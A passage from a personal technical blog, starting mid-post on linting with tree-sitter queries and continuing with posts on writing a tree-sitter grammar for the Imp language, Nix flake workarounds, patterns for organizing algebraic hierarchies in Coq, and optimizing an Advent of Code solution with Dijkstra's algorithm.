console.log(redundantQuery.captures(tree.rootNode));

This is what we get:

[
  {
    name: 'redundantAsgn',
    node: AsgnNode {
      type: asgn,
      startPosition: {row: 2, column: 0},
      endPosition: {row: 2, column: 6},
      childCount: 3,
    }
  },
  {
    name: 'left',
    node: IdNode {
      type: id,
      startPosition: {row: 2, column: 0},
      endPosition: {row: 2, column: 1},
      childCount: 0,
    }
  },
  // etc...
]

Ok, that’s a lot of detail! Notice that every capture name was reported along with what type of node matched and the start and end of the match. Some tools might want this information, but for us it’s enough to report only the start of the match and the text that the match corresponded to:

// Given a raw list of captures, extract the row, column and text.
function formatCaptures(tree, captures) {
  return captures.map((c) => {
    const node = c.node;
    delete c.node;
    c.text = tree.getText(node);
    c.row = node.startPosition.row;
    c.column = node.startPosition.column;
    return c;
  });
}

Now we get something more concise:

[
  { name: 'redundantAsgn', text: 'y := y', row: 2, column: 0 },
  { name: 'left', text: 'y', row: 2, column: 0 },
  { name: 'right', text: 'y', row: 2, column: 5 },
  { name: 'redundantAsgn', text: 'x := x', row: 6, column: 2 },
  { name: 'left', text: 'x', row: 6, column: 2 },
  { name: 'right', text: 'x', row: 6, column: 7 },
  { name: 'redundantAsgn', text: 'x := x', row: 8, column: 0 },
  { name: 'left', text: 'x', row: 8, column: 0 },
  { name: 'right', text: 'x', row: 8, column: 5 }
]

And of course, it’s trivial to filter out the captures corresponding to a given name:

// Get the captures corresponding to a capture name
function capturesByName(tree, query, name) {
  return formatCaptures(
    tree,
    query.captures(tree.rootNode).filter((x) => x.name == name)
  ).map((x) => {
    delete x.name;
    return x;
  });
}

Passing tree, redundantQuery and "redundantAsgn" to capturesByName, we get:

[
  { text: 'y := y', row: 2, column: 0 },
  { text: 'x := x', row: 6, column: 2 },
  { text: 'x := x', row: 8, column: 0 }
]

Now you can process these objects however you like. Note that tree-sitter uses zero-based indexing for the rows and columns, and you might want to offset it by one so users can locate it in their text editor. Here’s a simple approach:

// Lint the tree with a given message, query and match name
function lint(tree, msg, query, name) {
  console.log(msg);
  console.log(capturesByName(tree, query, name));
}

lint(tree, "Redundant assignments:", redundantQuery, "redundantAsgn");

We get the output:

Redundant assignments:
[
  { text: 'y := y', row: 2, column: 0 },
  { text: 'x := x', row: 6, column: 2 },
  { text: 'x := x', row: 8, column: 0 }
]

As a bonus, we can reuse our existing code for new queries! Here’s a couple:

Redundant if

((if condition: _ @c consequent: _ @l alternative: _ @r)
 (#eq? @l @r)) @redundantIf

Addition with 0
```
((plus (num) @n) (#eq? @n 0)) @addzero
```

Here are some exercises to try:

Recognize while loops containing only a skip statement
Recognize constant arithmetic and boolean expressions
Recognize unused variables (those that only appear on the left-hand side of an assignment)

Final thoughts and challenges

To appreciate it more, think about what we would have done had we not used tree-sitter. The process might have gone something like this:

Write the parser and generate an AST in a given language or parser generator
Annotate the AST with location information from the source file
Traverse the AST looking for matches of interest
Report them to the user

Note that there are several steps were things could go wrong or block us later. If we wrote the parser, say in Haskell using megaparsec, we would have not been able to recover the rows and columns of the syntax elements (or painfully write an abstract data type with annotations). And even worse, what happens when the user supplies syntactically invalid input? Some parser generators based on GLR parsing such as Bison allow for error recovery, but then we’d need to define a custom error token and come up with ad-hoc logic for dealing with it.

Tree-sitter separates these design choices into orthogonal ones. A tree-sitter grammar is easy to write and reusable in any language with a C FFI. The error recovery logic is pervasive yet unwritten, and the resulting AST is annotated with locations and can be easily pattern-matched over with queries.

Should we throw tree-sitter at every problem involving parsing? No! There are certainly some areas where we need syntax trees without error nodes, and sometimes the incremental parsing is not necessary. For instance, if we’re working with a build farm, we don’t want to build package definitions with syntax errors!

Beyond linting, tree-sitter has also found applications in GitHub’s search-based code navigation which also makes use of the query language to annotate the AST with tags.

How to write a tree-sitter grammar in an afternoon

2022-03-01T17:21:00+00:00

This article was discussed on Hacker News.

Every passing decade, it seems as if the task of implementing a new programming language becomes easier. Parser generators take the pain out of parsing, and can give us informative error messages. Expressive type systems in the host language let us pattern-match over a recursive syntax tree with ease, letting us know if we’ve forgotten a case. Property-based testing and fuzzers let us test edge cases faster and more completely than ever. Compiling to intermediate languages such as LLVM give us reasonable performance to even the simplest languages.

Say you have just created a new language leveraging the latest and greatest technologies in programming language land, what should you turn your sights to next, if you want people to actually adopt and use it? I’d argue that it should be writing a tree-sitter grammar. Before I elaborate what tree-sitter is, here’s what you’ll be able to achieve much more easily:

syntax highlighting
pretty-printing
linting
IDE-like features in your editor (autocomplete, structure navigation, jump to definition)

And the best part is that you can do it in an afternoon! In this post we’ll write a grammar for Imp, a simple imperative language, and you can get the source code here.

This post was inspired by my research in improving the developer experience for FORMULA and Spin.

Why tree-sitter?

Tree-sitter is a parser generator tool. Unlike other parser generators, it especially excels at incremental parsing, creating useful parse trees even when the input has syntax errors. And best of all, it’s extremely fast and dependency-free, letting you parse the entirety of the file on every keystroke in milliseconds. The generated parser is written in C, and there are many bindings to other programming languages, so you can programmatically walk the tree as well.

A tree-sitter grammar for Imp

Imp is a simple imperative language often used as an illustrative example in programming language theory. It has arithmetic expressions, boolean expressions and different kinds of statements including sequencing, conditionals and while loops.

Here’s an Imp program that computes the factorial of x and places the result in y.

// Compute factorial
z := x;
y := 1;
while ~(z = 0) do
  y := y * z;
  z := z - 1;
end

Setting up the project

Check out the official tree-sitter development guide.

If you’re using Nix, run nix shell nixpkgs#tree-sitter nixpkgs#nodejs-16-x to enter a shell with the necessary dependencies.

Note that you don’t need to have it set up to continue reading this post, since I’ll provide the terminal output at appropriate points.

Writing the grammar

Expressions

First we follow the grammar for expressions given in the chapter. Here it is for reference.

a := nat
   | id
   | a + a
   | a - a
   | a * a
   | (a)

b := true
   | false
   | a = a
   | a <= a
   | ~b
   | b && b

a corresponds to arithmetic expressions and b corresponds to boolean expressions.

The easiest things to handle are numbers and variables. We can add the following rules:

id: $ => /[a-z]+/,
nat: $ => /[0-9]+/,

The grammar for arithmetic expressions can easily be translated:

program: $ => $.aexp,
aexp: $ => choice(
    /[0-9]+/,
    /[a-z]+/,
    seq($.aexp,'+',$.aexp),
    seq($.aexp,'-',$.aexp),
    seq($.aexp,'*',$.aexp),
    seq('(',$.aexp,')'),
),

Defining precedence and associativity

Let’s try to compile it! Here’s what tree-sitter outputs:

Unresolved conflict for symbol sequence:

  aexp  '+'  aexp  •  '+'  …

Possible interpretations:

  1:  (aexp  aexp  '+'  aexp)  •  '+'  …
  2:  aexp  '+'  (aexp  aexp  •  '+'  aexp)

Possible resolutions:

  1:  Specify a left or right associativity in `aexp`
  2:  Add a conflict for these rules: `aexp`

Tree-sitter immediately tells that our rules are ambiguous, that is, the same sequence of tokens can have different parse trees. We don’t want to be ambiguous when writing code! Let’s make everything left-associative:

program: $ => $.aexp,
aexp: $ => choice(
    /[0-9]+/,
    /[a-z]+/,
    prec.left(1,seq($.aexp,'+',$.aexp)),
    prec.left(1,seq($.aexp,'-',$.aexp)),
    prec.left(1,seq($.aexp,'*',$.aexp)),
    seq('(',$.aexp,')'),
),

However, something’s not quite right when we parse 1*2-3*4:

It’s being parsed as ((1*2)-3)*4, which is clearly a different interpretation! We can fix this by specfiying prec.left(2,...) for *. The resulting parse tree we get is what we want.

Note that in many real language specs, the precedence of binary operators is given, so it becomes pretty routine to figure out the associativity and precedence to specify.

Boolean expressions and statements

The grammars for boolean expressions and statements are similar, and can be found in the accompanying repository.

Testing the grammar

Phew, so now we have a grammar that tree-sitter compiles. How do we actually run it? The tree-sitter CLI has two subcommands to help out with this, tree-sitter parse and tree-sitter test. The parse subcommand takes a path to a file and parses it with the current grammar, printing the parse tree to stdout. The test subcommand runs a suite of tests defined in a very simple syntax:

===
skip statement
===
skip
---

(program
  (stmt
    (skip)))

The rows of equal signs denote the name of the test, followed by the program to parse, then a line of dashes followed by the expected parse tree.

When we run tree-sitter test, we get a check if a test passed and a cross if it failed, complete with a diff showing the expected vs. actual parse tree (to illustrate the error I replaced the example code with skip; skip instead):

tests:
    ✗ skip
    ✓ assignment
    ✓ prec
    ✓ prog

1 failure:

expected / actual

  1. skip:

    (program
      (stmt
        (seq
          (stmt
            (skip))
          (stmt
            (skip)))))
        (skip)))

Syntax highlighting!

Believe it or not, that was pretty much all there is to writing a tree-sitter grammar! We can immediately put it to use by using it to perform syntax highlighting. Traditional syntax highlighting methods used in editors rely on regex and ad-hoc heuristics to colorize tokens, whereas since tree-sitter has access to the entire parse tree it can not only color identifiers, numbers and keywords, but also can do so in a context-aware fashion—for instance, highlighting local variables and user-defined types consistently.

The tree-sitter highlight command lets you generate syntax highlighting of your source code and render it in your terminal or output to HTML.

Tree-sitter’s syntax highlighting is based on queries. Importantly, we need to assign highlight names to different nodes in the tree. We only need the following 5 lines for this simple language. The square brackets indicate alternations, that is, if any of the nodes in the tree match an item in the list, then assign the given capture name (prefixed with @) to it.

[ "while" "end" "if" "then" "else" "do" ] @keyword
[ "*" "+" "-" "=" ":=" "~" ] @operator
(comment) @comment
(num) @number
(id) @variable.builtin

And here is what tree-sitter highlight --html on the factorial program gives

// Compute factorial
z := x;
y := 1;
while ~(z = 0) do
 y := y * z;
 z := z - 1;
end

Not bad! Operators, keywords, numbers and identifiers are clearly highlighted, and the comment being grayed out and italicized makes the code more readable.

Where to go from here?

Creating a tree-sitter grammar is only the beginning. Now that you have a fast, reliable way to generate syntax trees even in the presence of syntax errors, you can use this as a base to build other tools on. I’ll briefly describe some of the topics below but they really deserve their own blog post at a later date.

More highlighting

Syntax highlighting can become more informative semantically with tree-sitter. That is, we can have the syntax highlighter color local variable names one color, global variables another, distinguish between field access and method access, and more. Doing such nuanced highlighting using a regex-based highlighter is about as futile as trying to parse HTML with regex.

Editor integration

Tree-sitter grammars compile to a dynamic library which can be loaded into editors such as Emacs, Atom and VS Code on any platform (including WebAssembly). Using the extension mechanisms in each editor, you can build packages on top which can use the syntax tree for a variety of things, such as structural code navigation, querying the syntax tree for specific nodes (see screenshot), and of course syntax highlighting. Here’s an incomplete list of projects that use tree-sitter to enhance editing:

Linters

Tree-sitter has bindings in several languages. You can use this information and tree-sitter’s query language to traverse the syntax tree looking for specific patterns (or anti-patterns) in your programming language. To see this in action for Imp, see my minimal example of linting Imp with the JavaScript bindings. More details in a future post!

Final thoughts

Parsing technology has come a long way since the birth of computer science almost a century ago (see this excellent timeline of parsing). We’ve gone from being unable to handle recursive expressions and precedence to LALR parser generators and now GLR and fast incremental parsing with tree-sitter. It stands to reason that the tools millions of developers use every day to look at their code should take advantage of such developments. We can do better than line-oriented editing or hacky regexps to transform and highlight our code. The future is structural, and perhaps tree-sitter will play a big role in it!

Dirty Nix flake quality-of-life hacks

2022-02-13T04:09:00+00:00

Nix flakes landed in Nix (as an experimental option) with the 2.4 update a few months ago, and represents a substantial change in how projects using Nix can standardize their outputs, inputs and ensure reproducibility.

Nevertheless, this hermeticity comes with some downsides, especially when it comes to bandwidth, disk space and CPU usage. The reason for this is that Nixpkgs occasionally merges PRs that “rebuild the world,” for instance, staging next cycles, or urgent updates to OpenSSL and other critical packages (which cause a rebuild in say, Vim because it affects the git derivation used to fetch it.) Thus when you want to use a package that depends on an older or newer commit of Nixpkgs and some mass-rebuild PR landed in the intervening time, you’ll be faced with mass downloads of almost every dependency that probably did not change in terms of build contents, but whose build environments differed enough that Nix considers them different.

After over a year of using flakes in practice, I’ve noticed certain ways in which I overcome these inconveniences, which I’ll elaborate below.

Note that this isn’t to say the hacks are without drawbacks. I’ll make it apparent in each hack what the benefits and drawbacks are.

Avoiding mass rebuilds with input overriding

Scenario: want to avoid a mass rebuild when trying to build an older project

Fix: override the nixpkgs input with a fixed reference

Drawbacks: might lose reproducibility, but it’s fine if the changes weren’t major between the pinned commit and overriden one

Around a year ago, I started pinning my Nixpkgs registry. This lets me keep my flake reference to nixpkgs consistent across my systems (as opposed to using channels.) This is good when running commands with nix run so that instead of using the most up-to-date commit of Nixpkgs, it uses the pinned one from my system instead.

I then deploy my server configuration using a simple tool. So when I want to update my server I run the following command

$ nix run github:winterqt/deploy -- siraben-land
[0/81 built, 1/0/14 copied (3.7/924.4 MiB), 1.0/161.4 MiB DL] fetching llvm-13.0.0-lib from https://cache.nixos.org

Huh? What does LLVM have to do with using the deployment tool? Why are there 81 rebuilds? Such scenarios are commonplace in my experience, due to the gap between what the package set Nixpkgs to and where Nixpkgs is currently. The solution is thus to override the flake input altogether. Many flake commands accept the --override-input flag that takes two arguments; a path to override and the new flake reference to override it with. In the following command I’m overriding the input called nixpkgs with nixpkgs from my registry.

$ nix run github:winterqt/deploy --override-input nixpkgs nixpkgs --siraben-land
warning: not writing modified lock file of flake 'github:winterqt/deploy':
• Updated input 'nixpkgs':
    'github:NixOS/nixpkgs/5c37ad87222cfc1ec36d6cd1364514a9efc2f7f2' (2021-12-25)
  → 'github:NixOS/nixpkgs/a529f0c125a78343b145a8eb2b915b0295e4f459' (2022-01-31)

Notice that the reference to Nixpkgs went forward in time by a month. In this case, I avoided rebuilds and the server config deployed without any problems. Of course, the natural downside to this is that you might lose reproducibility if there were major changes between the two commits. In most non-critical cases, the resources and time saved are worth the risk.

Importing a path when using a Nix command

Scenario: when working with a pre-flakes project, we want to be able to build a derivation specified with a given expression

Fix: pass the --impure flag

Drawbacks: could lead to larger closure sizes

In the world of Nix flakes, impure references to things as such as the current directory are outright banned. For instance, suppose we’re on aarch64-darwin and we want to build GNU Hello for x86_64-darwin, before flakes we might run

$ nix-build -E 'with (import ./. {system="x86_64-darwin";}); hello'

So the Nix command equivalent would be

$ nix build --expr 'with (import ./. {system="x86_64-darwin";}); hello'
error: access to absolute path '/Users/siraben/Git/forks/nixpkgs' is forbidden in pure eval mode (use '--impure' to override)
(use '--show-trace' to show detailed location information)

As the error message suggests, we have to pass --impure to it, resulting in

$ nix build --impure --expr 'with (import ./. {system="x86_64-darwin";}); hello'

which succeeds as usual. Note that this might lead to increased closure sizes because a path reference results in the entire directory of the package being copied to the Nix store.

Building unfree or unsupported packages

Scenario: want to build unfree packages or packages that are marked as broken for the current platform

Fix: pass --impure to nix build

Drawbacks: mostly harmless™

As an example, the math-comp book has a flake.nix file defined. So we might be tempted to try to build the book with flakes:

$ nix build github:math-comp/mcb
error: Package ‘math-comp-book’ in /nix/store/z5d23mcmv3va30nfkg1q40iz62xyi57a-source/flake.nix:36 has an unfree license (‘cc-by-nc-40’), refusing to evaluate.

       a) To temporarily allow unfree packages, you can use an environment variable
          for a single invocation of the nix tools.

            $ export NIXPKGS_ALLOW_UNFREE=1

       b) For `nixos-rebuild` you can set
         { nixpkgs.config.allowUnfree = true; }
       in configuration.nix to override this.

       Alternatively you can configure a predicate to allow specific packages:
         { nixpkgs.config.allowUnfreePredicate = pkg: builtins.elem (lib.getName pkg) [
             "math-comp-book"
           ];
         }

       c) For `nix-env`, `nix-build`, `nix-shell` or any other Nix command you can add
         { allowUnfree = true; }
       to ~/.config/nixpkgs/config.nix.
(use '--show-trace' to show detailed location information)

Unfortunately in this case it’s not clear what the fix is. Even if you set that environment variable, you still get the same error message. Again harkening back to the philosophy of Nix flakes, querying environment variables is considered impure. The fix is to again pass the --impure flag while setting the environment variable at the same time.

$ NIXPKGS_ALLOW_UNFREE=1 nix build --impure github:math-comp/mcb && tree ./result
./result
└── share
    └── book.pdf

There really isn’t any downside to this method, as far as I know. Unless environment variables you set in your shell also affect other aspects of the build, everything should be the same, and you’ll be able to run and build packages that were marked as broken or unfree previously.

Final thoughts

Nix flakes isn’t to blame for these workarounds arising per se. In a sense, Nix becomes too pure to the extent where resources are being used when they don’t strictly need to, especially for non-critical use cases. In the future, features such as a content-addressed store may help with issues such as mass rebuilds, where package hashes are determined by their build contents and not their input derivations.

Organizing mathematical theories in Coq: an overview

2022-02-08T18:01:00+00:00

Programming and mathematics have much in common, philosophically. The disciplines deal with constructions of various kinds. The constructions can get arbitrarily complex and interconnected. As a result, it’s no surprise that concepts such as overloaded notations, implicit coercions and inheritance pop up frequently in both disciplines. For instance, a field inherits the properties of a ring, which in turn inherit from Abelian groups. The symbol + can mean different things depending on if we’re talking about vector spaces or coproducts. Mathematical structures even exhibit multiple inheritance. For instance, here’s the dependency graph of the real number type in the mathcomp-analysis library.

From left to right, the structures can be roughly classified as pertaining to order theory, algebra and topology. For the object-oriented programmer: how many instances of multiple inheritance do you see?

It’s important to capture the way structures are organized in mathematics in a proof assistant with some uniform strategy, well-known in the OOP world as “design patterns.” In this article I will catalogue and explain a selection of various patterns and their strengths and benefits. They are (in order of demonstration):

typeclasses
hierarchy builder
packed classes and canonical structures
structures and telescopes
records
modules

For convenience as a reference I will start with the most recommended elegant and boilerplate-free patterns to the ugliest and broken ones.

The running example will be a simple algebraic hierarchy: semigroup, monoid, commutative monoid, group, Abelian group. That should be elaborate enough to show how the approaches hold up in a more realistic setting. Here’s an overview of the hierarchy we’ll be building over a type A:

Semigroup
- add : A -> A -> A (a binary operation over A)
- addrA : forall x y z, add x (add y z) = add (add x y) z
Monoid (inherits from Semigroup)
- zero : A
- add0r : forall x, add zero x = x
- addr0 : forall x, add x zero = x
ComMonoid (inherits from Monoid)
- addrC : addrC : forall (x y : A), add x y = add y x;
Group (inherits from Monoid)
- opp : A -> A (inverse function)
- addNr : forall x, add (opp x) x = zero (addition of an element with its inverse results in identity)
AbGroup (inherits from ComMonoid and Group)

You may also see ssreflect style statements such as associative add.

Then, if all goes well, we will test the expressiveness of our hierarchy by proving a simple lemma, which makes use of a law from every structure.

(* Let A an instance of AbGroup, then the lemma holds *)
Lemma example A (a b : A) : add (add (opp b) (add b a)) (opp a) = zero.
Proof. by rewrite addrC (addrA (opp b)) addNr add0r addNr. Qed.

Typeclasses

Reading: Type Classes for Mathematics in Type Theory

A well-known and vanilla approach is to use typeclasses. This goes very well, our declaration for AbGroup is just the constraints, similar to how it would be done in Haskell. However, pay special attention to the definition of AbGroup, there’s a ! in front of the ComMonoid constraint to expose the implicit arguments again, so that it can implicitly inherit the monoid instance from G.

Require Import ssrfun ssreflect.

Class Semigroup (A : Type) (add : A -> A -> A) := { addrA : associative add }.

Class Monoid A `{M : Semigroup A} (zero : A) := {
  add0r : forall x, zero + x = x;
  addr0 : forall x, x + zero = x
}.

Class ComMonoid A `{M : Monoid A} := { addrC : commutative add }.

Class Group A `{M : Monoid A} (opp : A -> A) := {
  addNr : forall x, add (opp x) x = zero
}.

Class AbGroup A `{G : Group A} `{CM : !ComMonoid A}.

The example lemma is easily proved, showing the power of typeclass resolution in unifying all the structures.

Lemma example A `{M : AbGroup A} (a b : A)
  : add (add (opp b) (add b a)) (opp a) = zero.
Proof. by rewrite addrC (addrA (opp b)) addNr add0r addNr. Qed.

See the accompanying gist for the instantation of the structures over ℤ.

Hierarchy Builder

The Hierarchy Builder (HB) package is best described as a boilerplate generator, but in a good way! From a usability point of view, it is similar to typeclasses.

First we define semigroups. HB.mixin Record IsSemigroup A declares that we are about to define a predicate IsSemigroup over a type A, and the two entries in the record denote the binary operation and its associativity, respectively. We also define an infix notation for convenience.

From HB Require Import structures.
From Coq Require Import ssreflect.

(* Semigroup definition *)
HB.mixin Record IsSemigroup A := {
  add : A -> A -> A;
  addrA : forall x y z, add x (add y z) = add (add x y) z;
}.

HB.structure Definition Semigroup := { A of IsSemigroup A }.

(* Left associative by default *)
Infix "+" := add.

Next we define monoids. Similarly to semigroups we use the mixin command, but now declare the inheritance by of IsSemigroup A. That is, for a type to be a monoid, it must be a semigroup first.

(* Monoid definition, inheriting from Semigroup *)
HB.mixin Record IsMonoid A of IsSemigroup A := {
  zero : A;
  add0r : forall x, add zero x = x;
  addr0 : forall x, add x zero = x;
}.

HB.structure Definition Monoid := { A of IsMonoid A }.

Notation "0" := zero.

Now that we’ve seen two examples, there’s no surprises left on how to define commutative monoids and groups.

(* Commutative monoid definition, inheriting from Monoid *)
HB.mixin Record IsComMonoid A of Monoid A := {
  addrC : forall (x y : A), x + y = y + x;
}.

HB.structure Definition ComMonoid := { A of IsComMonoid A }.

(* Group definition, inheriting from Monoid *)
HB.mixin Record IsGroup A of Monoid A := {
  opp : A -> A;
  addNr : forall x, opp x + x = 0;
}.

HB.structure Definition Group := { A of IsGroup A }.

Notation "- x" := (opp x).

Now for the interesting part. Hierarchy Builder makes it easy for us to do multiple inheritance and combine the constraints, much like typeclasses. Then we can seemlessly prove the lemma exactly as we did before.

(* Abelian group definition, inheriting from Group and ComMonoid *)
HB.structure Definition AbGroup := { A of IsGroup A & IsComMonoid A }.

(* Lemma that holds for Abelian groups *)
Lemma example (G : AbGroup.type) (a b : G) : -b + (b + a) + -a = 0.
Proof. by rewrite addrC (addrA (opp b)) addNr add0r addNr. Qed.

The underlying code it generates follows a pattern known as packed classes (elaborated in the next section). For future-proofing, the generated code can be shown by prefixing a HB command with #[log]. When the HB.structure command is invoked, a bunch of mixins and definitions are created. For brevity I’m omitted some of them here.

...
Top_AbGroup__to__Top_Semigroup is defined
Top_AbGroup__to__Top_Monoid is defined
Top_AbGroup__to__Top_Group is defined
Top_AbGroup__to__Top_ComMonoid is defined
join_Top_AbGroup_between_Top_ComMonoid_and_Top_Group is defined
...

In more detail, here is the output of Print Top_AbGroup__to__Top_ComMonoid., which shows that it is a coercion that lets us go from an Abelian group structure to a commutative monoid structure (i.e. going back up the hierarchy.) Hierarchy Builder automatically creates these coercions and joins for us.

Top_AbGroup__to__Top_ComMonoid = 
fun s : AbGroup.type =>
{| ComMonoid.sort := s; ComMonoid.class := AbGroup.class s |}
     : AbGroup.type -> ComMonoid.type

Top_AbGroup__to__Top_ComMonoid is a coercion

It is worth noting that the math-comp library is undergoing a transition to use Hierarchy Builder in the future, instead of hand-written instances and coercions.

Packed classes & canonical structures

Reading: Canonical structures for the working Coq user

In the math-comp library, the approach taken is known as the packed classes design pattern. It’s a fairly complicated construct that I might elaborate more in a future blog post, but I’ll give some highlights and a full example.

Note that math-comp is being ported to Hierarchy builder, so this style is being phased out.

Telescopes

According to the Mathematical Components book,

Telescopes suffice for most simple — tree-like and shallow — hierarchies, so new users do not necessarily need expertise with the more sophisticated packed class organization covered in the next section

Here’s how to define a monoid. We create a module, postulate a type T and an identity element zero of type T, and combine the laws into a record called law. The exports section is small here but we export just the operator coercion.

Module Monoid.

Section Definitions.
Variables (T : Type) (zero : T).

Structure law := Law {
  operator : T -> T -> T;
  _ : associative operator;
  _ : left_id zero operator;
  _ : right_id zero operator
}.

Local Coercion operator : law >-> Funclass.

End Definitions.

Module Import Exports.

Coercion operator : law >-> Funclass.

End Exports.
End Monoid.

Export Monoid.Exports.

With that defined, we can instantiate the monoid structure for booleans (note that zero is automatically unified with true).

Import Monoid.

Lemma andbA : associative andb. Proof. by case. Qed.
Lemma andTb : left_id true andb. Proof. by case. Qed.
Lemma andbT : right_id true andb. Proof. by case. Qed.

Canonical andb_monoid := Law andbA andTb andbT.

Records

Let’s define a semigroup using one of the most basic features of Coq, records. Writing it this way means it is simply just a conjunction of laws as an n-ary predicate over n components. We define the semigroup structure first, then consider monoids as an augmented semigroup.

Require Import ssrfun.

Record Semigroup {A : Type} : Type := makeSemigroup {
  s_add : A -> A -> A;
  s_addrA : associative s_add;
}.

Record Monoid {A : Type} : Type := makeMonoid {
  m_semi : @Semigroup A;
  m_zero : A;
  m_add0r : forall x, (s_add m_semi) m_zero x = x;
  m_addr0 : forall x, (s_add m_semi) x m_zero = x;
}.

Unfortunately we already have to make an awkward choice to do some sort of indexing to access the underlying shared associative binary operation. At the next level when one defines groups as an augmented monoid, the situation only gets worse:

Record Group {A : Type} : Type := makeGroup {
  m_monoid : @Monoid A;
  g_inv : A -> A;
  g_addNr : forall x, (s_add (m_semi m_monoid)) (g_inv x) x = m_zero m_monoid;
}.

We have to access the operation through two different indexes for it! Perhaps we might want to add a member to the record that is equal to the inherited operation, but this too is not satisfactory since it prevents us from creating a canonical name for the operation in question (for instance, add), and we’d have to do this at arbitrarily nested levels. Thus, while flexible, this approach does not scale.

Modules

One approach, seen in CPDT is to use the module system to organize the hierarchy. It seems fine for the first few structures. We declare parameterized modules and postulate additional axioms upon the structure from which it is inheriting from.

Require Import ssrfun.

Module Type SEMIGROUP.
  Parameter A: Type.
  Parameter Inline add: A -> A -> A.
  Axiom addrA : associative add.
End SEMIGROUP.

Module Type MONOID.
  Include SEMIGROUP.
  Parameter zero : A.
  Axiom add0r : left_id zero add.
End MONOID.

Module Type COM_MONOID.
  Include MONOID.
  Axiom addrC : commutative add.
End COM_MONOID.

Module Type GROUP.
  Include MONOID.
  Parameter opp : A -> A.
  Axiom addNr : forall x, add (opp x) x = zero.
End GROUP.

However, we immediately run into an issue when trying to create a Abelian group from a commutative monoid and group, this is because the carrier type A is already in scope from the first include, so we cannot share the carrier type (or even the underlying monoid) with GROUP. So we give up.

Module Type COM_GROUP.
  Include COM_MONOID.
  Fail Include GROUP.
End COM_GROUP.

The command has indeed failed with message:
The label A is already declared.

Final thoughts

Just like software engineering, there are many ways to organize mathematical theories in proof assistants such as Coq.

Personally, I would lean more towards organizing my theories with Hierarchy Builder—or at the very least, typeclasses, if external dependencies are an issue.

Speeding up my AoC solution by a factor of 2700 with Dijkstra’s

2021-12-28T16:52:00+00:00

Note: this post contains spoilers for one of the days of Advent of Code 2021.

This article was discussed on Hacker News.

This year, I had a lot of fun with Advent of Code. There’s a nice problem solving aspect of it and refining your initial solution is always a fun exercise.

I do my solutions in Haskell, and AoC problems can be nice explorations into various performance-wise aspects of GHC’s runtime. My README has some notes on what my general approach is to getting programs to run faster.

But sometimes, you can get solutions that run orders of magnitude faster, and this year I encountered such a case where my solution ran over 2700 times faster! Let’s dive in.

A naïve attempt

Day 15 asks us to compute the lowest sum possible that results from traversing a grid from one corner to the other, where the possible moves are moving by one in the four cardinal directions. When I saw this problem, I thought, “this is just recursion!” Naturally, I wrote such a recursive solution (glguy notes on IRC that this would be a lot faster if I memoized the calls.) The base case is if we’re at the origin point, the cost is 0. Otherwise, the minimum cost starting at (r,c) is the cost of the cell at (r,c) added with the minimum of recursively solving the same problem for (r-1,c), (r,c-1) and (r,c+1).

import qualified Data.Map as M

minSum :: Int -> Int -> M.Map (Int, Int) Int -> Int
minSum r c g
  | r == 0 || c == 0 = 0
  | otherwise = g M.! (r, c) + minimum [minSum (r - 1) c g, minSum r (c - 1) g, minSum r (c + 1) g]

This was sufficient for the very small example they gave. But it fails even on part 1, which was a 100 by 100 grid! In fact, it is an incorrect solution as well (if we restrict the problem to only down and right moves then a dynamic programming solution would work.)

Clearly, even a naïve solution won’t save us here. The next approach I went with uses Dijkstra’s Algorithm. One limitation I impose on myself in solving Advent of Code is to not use any libraries outside the GHC bootstrap libraries. This is simply because in some environments such as Google Code Jam or Codeforces, fancy libraries would not exist, but ones such as containers certainly would be.

And sure enough, Dijkstra’s algorithm was able to solve part 1 in a few seconds. Part 2 however, just kept churning. I left my computer running then returned to see the result, which was accepted by the validator online. My shell also prints out how long the previous command took to execute, so that acted as a timer.

Finding cost centers

Even though we got the right answer, there’s no way that this is a reasonable runtime for a solution. To find the culprit, I ran the Haskell profiler on the program solving part 1.

COST CENTRE                  MODULE    SRC                        %time %alloc

dijkstra.step3.nextVert.v.\  Main      day15.hs:101:47-96          86.1    0.0
dijkstra.step3.nextVert.v    Main      day15.hs:101:13-128         11.8   28.2
...

The function to compute the next vertex to visit (see the pseudocode) by choosing vertex by minimum distance from source.

v :: (Int, Int)
v = minimumBy (\x y -> compare (dv M.! x) (dv M.! y)) q

where q is the set of vertices left to visit and dv is a map from vertices to distances. Using minimumBy on a Set in Haskell calls foldl' on sets, which is here. This procedure of course will be linear in the size of the set, and a 500 by 500 grid has 250,000 vertices to find the minimum of each time we want to select another vertex. Yikes. I imagined, “what if we were able to just find the next vertex of minimum distance from the source in constant time?” Thus, we would be able to breeze through this part of the algorithm and bring the runtime significantly down.

Priority queues from scratch

There’s a nice “duality” to the operation of Dijkstra’s algorithm when you use a priority queue. You have a map where the keys are vertices and the elements are distances, but when you select the next vertex to visit, you use a priority queue where the keys (priorities) are distances and the elements are vertices. The structure of each is optimized for a different aspect of the algorithm, so conflating the two would intuitively cause slowdown. With that in mind, we can define a priority queue as just a map from Ints to lists of values of that priority.

type PQueue a = IntMap [a]

Getting a next minimal element from the priority queue is easy, since IntMaps already a provide a minViewWithKey function. Insertion is similarly easy to write up. The empty priority queue is just an empty IntMap.

-- Retrieve an element with the lowest priority
pminView :: PQueue a -> ((Key, a), PQueue a)
pminView p =
  let Just (l, p') = IM.minViewWithKey p
   in case l of
        (_, []) -> pminView p'
        (k, x : xs) -> ((k, x), if null xs then IM.delete k p' else IM.insert k xs p')

-- Insertion of an element with a specified priority
pins :: Int -> a -> PQueue a -> PQueue a
pins k x = IM.insertWith (++) k [x]

Note that pminView already returns the new map with the minimal element removed, so we don’t need to write another deletion function.

With those functions in hand, and lots of rewriting, I finally cracked it!

Benchmarks!

The results were staggering—part 2 was sped up by a factor of 2545, which is a serious demonstration of how even if you have the right algorithm, the choice of how you represent auxillary data in the algorithm matters.

benchmarking day15/part2
time                 1.172 s    (1.088 s .. 1.259 s)
                     0.999 R²   (0.997 R² .. 1.000 R²)
mean                 1.213 s    (1.190 s .. 1.244 s)
std dev              29.96 ms   (12.16 ms .. 39.32 ms)
variance introduced by outliers: 19% (moderately inflated)

After checking the cost centers again, a small adjustment to how neighbors were computed reduced the mean running time to 1.098 seconds, which amounts to a 2716 times speedup!

Final thoughts

Not using premade libraries was a great pedagogical constraint because it forced me to get to the essence of an algorithm or data structure. While implementations of Dijkstra’s algorithm exists in various Haskell libraries, they are often too optimized or specialized to certain structures. There’s a lot to be learned from doing things from scratch!